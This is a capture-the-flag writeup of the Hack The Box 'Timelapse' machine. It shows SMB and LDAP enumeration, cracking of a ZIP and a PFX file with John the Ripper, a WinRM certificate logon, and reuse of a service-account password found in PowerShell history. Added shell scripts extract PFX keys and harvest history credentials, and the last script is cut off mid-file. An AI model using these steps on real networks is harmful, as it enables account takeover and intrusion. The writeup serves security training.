
【Hack The Box】Timelapse【WriteUp】

Posted at 2023-08-04

Introduction

This article is a writeup of the HackTheBox machine "Timelapse" (see the link below; hereafter HTB), written to improve our team's technical skills and to build an attacker's point of view.

Initial enumeration

On an HTB machine you are given a single target IP (here 10.10.11.152).
Port-scan that IP to find which ports are open.

nmap port scan

┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -n -Pn -v -sS -A 10.10.11.152 --top-ports 1000

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:24 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating SYN Stealth Scan at 13:24
Scanning 10.10.11.152 [1000 ports]
Discovered open port 139/tcp on 10.10.11.152
Discovered open port 445/tcp on 10.10.11.152
Discovered open port 53/tcp on 10.10.11.152
Discovered open port 135/tcp on 10.10.11.152
Discovered open port 636/tcp on 10.10.11.152
Discovered open port 593/tcp on 10.10.11.152
Discovered open port 88/tcp on 10.10.11.152
Discovered open port 3268/tcp on 10.10.11.152
Discovered open port 3269/tcp on 10.10.11.152
Discovered open port 464/tcp on 10.10.11.152
Discovered open port 389/tcp on 10.10.11.152
Completed SYN Stealth Scan at 13:24, 11.79s elapsed (1000 total ports)
Initiating Service scan at 13:24
Scanning 11 services on 10.10.11.152
Completed Service scan at 13:24, 20.93s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.152
Retrying OS detection (try #2) against 10.10.11.152
Initiating Traceroute at 13:25
Completed Traceroute at 13:25, 0.21s elapsed
NSE: Script scanning 10.10.11.152.
Initiating NSE at 13:25
Completed NSE at 13:25, 40.10s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 6.05s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Nmap scan report for 10.10.11.152
Host is up (0.20s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-31 12:24:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-31T12:25:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h59m56s

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   198.79 ms 10.10.14.1
2   199.00 ms 10.10.11.152

NSE: Script Post-scanning.
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.67 seconds
           Raw packets sent: 2087 (95.886KB) | Rcvd: 54 (3.262KB)

A lot of ports are open, but they are the usual set for a Windows domain environment (DNS, Kerberos, LDAP/LDAPS, SMB, RPC), which points at a domain controller.
Pull the root DSE entry over LDAP to confirm the domain details.

┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -p 389 -n -Pn 10.10.11.152 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:32 JST
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=timelapse,DC=htb
|       ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
|       namingContexts: DC=timelapse,DC=htb
|       namingContexts: CN=Configuration,DC=timelapse,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 131224
|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
|       dnsHostName: dc01.timelapse.htb
|       defaultNamingContext: DC=timelapse,DC=htb
|       currentTime: 20230731123235.0Z
|_      configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb
Service Info: Host: DC01; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

That gives us the domain controller: dc01.timelapse.htb in the domain timelapse.htb.
Next, try a tool that quickly enumerates a Windows environment.

┌──(root㉿kali-linux-2022-2)-[~]
└─# enum4linux 10.10.11.152
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jul 31 13:28:33 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.11.152 )================================

Looking up status of 10.10.11.152
No reply from 10.10.11.152

 ===================================( Session Check on 10.10.11.152 )===================================


[+] Server 10.10.11.152 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.11.152 )================================

Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.11.152 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.11.152 from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 10.10.11.152 )=======================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
                                                                                                                   
                                                                                                                   
 =================================( Share Enumeration on 10.10.11.152 )=================================
                                                                                                                   
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                            

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.152                                                                       
                                                                                                                   
                                                                                                                   
 ============================( Password Policy Information for 10.10.11.152 )============================
                                                                                                                   
                                                                                                                   
[E] Unexpected error from polenum:                                                                                 
                                                                                                                   
                                                                                                                   

[+] Attaching to 10.10.11.152 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.11.152)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient                                                                   
                                                                                                                   
                                                                                                                   

 =======================================( Groups on 10.10.11.152 )=======================================
                                                                                                                   
                                                                                                                   
[+] Getting builtin groups:                                                                                        
                                                                                                                   
                                                                                                                   
[+]  Getting builtin group memberships:                                                                            
                                                                                                                   
                                                                                                                   
[+]  Getting local groups:                                                                                         
                                                                                                                   
                                                                                                                   
[+]  Getting local group memberships:                                                                              
                                                                                                                   
                                                                                                                   
[+]  Getting domain groups:                                                                                        
                                                                                                                   
                                                                                                                   
[+]  Getting domain group memberships:                                                                             
                                                                                                                   
                                                                                                                   
 ==================( Users on 10.10.11.152 via RID cycling (RIDS: 500-550,1000-1050) )==================
                                                                                                                   
                                                                                                                   
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                          
                                                                                                                   
                                                                                                                   
 ===============================( Getting printer info for 10.10.11.152 )===============================
                                                                                                                   
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED                                            


enum4linux complete on Mon Jul 31 13:29:31 2023

Nothing particularly useful: the null session is accepted, but nearly every RPC call (srvsvc, SAMR, spoolss, RID cycling) returns NT_STATUS_ACCESS_DENIED.
So investigate each protocol individually.

SMB

SMB is open, so gather SMB information by running the main nmap SMB scripts in one go.

┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -p 445 -n -Pn 10.10.11.152 --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:46 JST
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2:0:2
|     2:1:0
|     3:0:0
|     3:0:2
|_    3:1:1

Nmap done: 1 IP address (1 host up) scanned in 16.34 seconds

Only SMB 2 and 3 dialects are offered (no SMBv1), so there is nothing obviously exploitable at the protocol level. Next, check whether any shares are readable anonymously.

┌──(root㉿kali-linux-2022-2)-[~]
└─# smbclient -N -L \\\\10.10.11.152

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Besides the default shares there is a non-default share named Shares. Let's look inside.

┌──(root㉿kali-linux-2022-2)-[~/work]
└─# smbclient -N  \\\\10.10.11.152\\Shares
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Oct 26 00:39:15 2021
  ..                                  D        0  Tue Oct 26 00:39:15 2021
  Dev                                 D        0  Tue Oct 26 04:40:06 2021
  HelpDesk                            D        0  Tue Oct 26 00:48:42 2021

                6367231 blocks of size 4096. 2462771 blocks available

There are two folders, so grab everything at once.
The usual smbclient incantation for a recursive bulk download:

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (547.9 KiloBytes/sec) (average 397.9 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (130.6 KiloBytes/sec) (average 338.8 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (634.0 KiloBytes/sec) (average 403.3 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (92.2 KiloBytes/sec) (average 358.0 KiloBytes/sec)
smb: \> 

The files downloaded successfully.
There is a LAPS installer with its documentation, and a ZIP archive.
Trying to extract the ZIP prompts for a password, so the next step is to crack it.
[screenshot: unzip prompting for a password]

Credential extraction

zip

Use John the Ripper to recover the password of the protected ZIP.
First convert the archive into a hash format john can work with.

┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# zip2john winrm_backup.zip > zip.hash        
Created directory: /root/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

Crack it with john.

┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# john --wordlist=./rockyou.txt zip.hash             
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2023-07-31 14:03) 3.030g/s 10724Kp/s 10724Kc/s 10724KC/s tabatha916..stefronc
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The password is supremelegacy.
Use it to extract the ZIP.
[screenshot: unzip with the recovered password]
Extraction produces a PKCS#12 file (.pfx): legacyy_dev_auth.pfx.
If this is a client-authentication certificate, we can extract the private key and certificate and use them to log in to the target.
Extracting the contents also requires a password, so crack the pfx password next.

pfx

Convert it into a crackable format, as before.

┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# pfx2john legacyy_dev_auth.pfx > pfx.hash

Crack it with john. Note that this one takes noticeably longer than the ZIP: PKCS#12 uses an iterated password-based KDF (2000 iterations here), so the candidate rate drops from millions to about 20k per second.

┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# john --wordlist=./rockyou.txt pfx.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:02:34 DONE (2023-07-31 14:12) 0.006467g/s 20902p/s 20902c/s 20902C/s thyriana..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The password is thuglegacy.
Use it to extract the private key and certificate.
[screenshot: openssl pkcs12 extraction of key and certificate]
With those in hand, log in over WinRM.
[screenshot: Evil-WinRM certificate login as legacyy]
Login succeeded, which gives us the user.txt flag.
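The extraction and logon steps above only appear as screenshots in the original. What follows is an added example, not the writeup's own commands, that performs them with openssl and shows the Evil-WinRM call. Because the real legacyy_dev_auth.pfx cannot be shipped here, the script first generates a stand-in .pfx (self-signed, CN=legacyy, same password thuglegacy) as a constructed sample; the function names and the temp-directory layout are mine. It also adds the two checks a practitioner wants before attempting the logon: that the certificate's EKU actually includes client authentication, and that the extracted key really belongs to the certificate.

```shell
#!/bin/sh
# Added example (not from the original writeup): split a password-protected
# PKCS#12 file into private key + certificate, check the certificate is usable
# for client authentication, and show the Evil-WinRM invocation that uses it.
# The box's file is legacyy_dev_auth.pfx / password thuglegacy; a stand-in with
# the same password and CN=legacyy is generated locally (constructed sample).
set -eu

WORK="$(mktemp -d)"
PFX="$WORK/legacyy_dev_auth.pfx"
PFX_PASS='thuglegacy'

# constructed sample: self-signed client-auth certificate wrapped in a .pfx
make_sample_pfx() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
        -subj '/CN=legacyy' \
        -addext 'extendedKeyUsage=clientAuth' \
        -keyout "$WORK/sample.key" -out "$WORK/sample.crt" >/dev/null 2>&1
    openssl pkcs12 -export -inkey "$WORK/sample.key" -in "$WORK/sample.crt" \
        -out "$PFX" -passout "pass:$PFX_PASS"
}

# extract_pfx <pfx> <password> <outdir>: writes priv.key (no passphrase) and cert.pem
extract_pfx() {
    pfx="$1"; pass="$2"; out="$3"
    # -nocerts -nodes: only the private key, written unencrypted
    openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes -out "$out/priv.key"
    # -nokeys: only the certificate(s)
    openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nokeys -out "$out/cert.pem"
    chmod 600 "$out/priv.key"
}

# cert_cn <cert.pem>: subject CN, i.e. which account the certificate identifies
cert_cn() {
    openssl x509 -in "$1" -noout -subject -nameopt RFC2253 \
        | sed 's/^subject= *//; s/^CN=//'
}

# cert_is_client_auth <cert.pem>: succeeds if the EKU includes TLS client auth
cert_is_client_auth() {
    openssl x509 -in "$1" -noout -ext extendedKeyUsage 2>/dev/null \
        | grep -q 'TLS Web Client Authentication'
}

# key_matches_cert <priv.key> <cert.pem>: succeeds if both carry the same public key
key_matches_cert() {
    k="$(openssl pkey -in "$1" -pubout 2>/dev/null)"
    c="$(openssl x509 -in "$2" -pubkey -noout 2>/dev/null)"
    [ "$k" = "$c" ]
}

make_sample_pfx
extract_pfx "$PFX" "$PFX_PASS" "$WORK"
echo "certificate identifies: $(cert_cn "$WORK/cert.pem")"
if cert_is_client_auth "$WORK/cert.pem" && key_matches_cert "$WORK/priv.key" "$WORK/cert.pem"; then
    echo "clientAuth EKU present and key matches: usable for WinRM certificate logon"
fi

# With the real key and certificate the logon is (-S = WinRM over HTTPS, port 5986):
#   evil-winrm -i 10.10.11.152 -S -k priv.key -c cert.pem
```

The -S flag matters: certificate authentication only works on the HTTPS listener, and 5986 is not among nmap's default top-1000 ports, so it never showed up in the first scan; the PowerShell history read later on the box confirms the listener with -port 5986 -usessl.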

Lateral movement

LAPS_Readers

The hint for privilege escalation was already picked up during SMB enumeration: the LAPS installer and documentation on the share strongly suggested LAPS would be the escalation path.
I used the following documentation as a reference.

First, check whether legacyy is a member of the LAPS_Readers group.

*Evil-WinRM* PS C:\Users\legacyy> net user legacyy
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/31/2023 6:16:31 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.

legacyy is not in LAPS_Readers (only Domain Users and Development), so further enumeration is needed.

Enumeration

Manual enumeration would be slow, so use winPEAS (here the .bat build, launched from the Evil-WinRM PowerShell session).

*Evil-WinRM* PS C:\Users\legacyy\Desktop> .\winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
    + CategoryInfo          : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine                       by carlospolop


The system cannot find the batch label specified - T_Progress/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine   [i] Check for vulnerabilities for the OS version with the applied patches
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
Access is denied.
The system cannot find the batch label specified - T_ProgressERROR:Description = Access denied
Access is denied.
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] You may need to adjust your local date/time to exploit some vulnerability
Mon 07/31/2023
06:29 AM

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Check what is being logged


The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Check where are being sent the logs

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Check what is being logged

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
    AdmPwdEnabled    REG_DWORD    0x1


The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Active if "1"


The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Active if "1" or "2"



The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Plain-text creds in memory if "1"

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] You need System-rights to extract them

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    CACHEDLOGONSCOUNT    REG_SZ    10

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1


The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLineERROR:Description = Invalid namespace
Checking for defender whitelisted PATHS

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLinePowerShell v2 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
    PowerShellVersion    REG_SZ    2.0

PowerShell v5 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
    PowerShellVersion    REG_SZ    5.1.17763.1

Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:

PS default transcript history

Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)  10,084,839,424 bytes free

The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Maybe you find something interesting


The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine   [i] Interesting information?
...(omitted)

It throws a flood of "cannot find the batch label" errors, but part of the enumeration still succeeds (the AdmPwdEnabled=1 registry value, for example, confirms LAPS is active on this host).
One section of the output stands out:

Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)  10,084,839,424 bytes free

It reports a PowerShell history file, so go and read the command history.

PS history

Check the contents of the history file.

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> 

The history shows a command being run over WinRM with an explicit credential: the password for svc_deploy was typed in clear text via ConvertTo-SecureString -AsPlainText, and PSReadLine recorded it.
Reuse that credential to move laterally to svc_deploy.
[screenshot: Evil-WinRM login as svc_deploy]
Login as svc_deploy succeeded.
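Here is an added example (not part of the original writeup) that automates what was just done by hand: walk a tree of user profiles (a mounted disk image, or profiles copied down over C$) for PSReadLine history files and pair each ConvertTo-SecureString -AsPlainText secret with the PSCredential object that consumes it. The history file is a constructed sample that mirrors the box's file plus a second, invented account (svc_example / ExamplePass1); the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original writeup): extract hard-coded
# credentials from PowerShell history. PSReadLine logs every interactive
# command to %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt,
# so a pair of lines such as
#   $p = ConvertTo-SecureString 'secret' -AsPlainText -Force
#   $c = New-Object System.Management.Automation.PSCredential ('user', $p)
# leaks a usable account. Useful both when looting a host and when auditing one.
set -eu

WORK="$(mktemp -d)"
ROOT="$WORK/Users"
HIST="$ROOT/legacyy/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
mkdir -p "$(dirname "$HIST")"

# constructed sample history: the box's lines plus one invented account
cat > "$HIST" <<'EOF'
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
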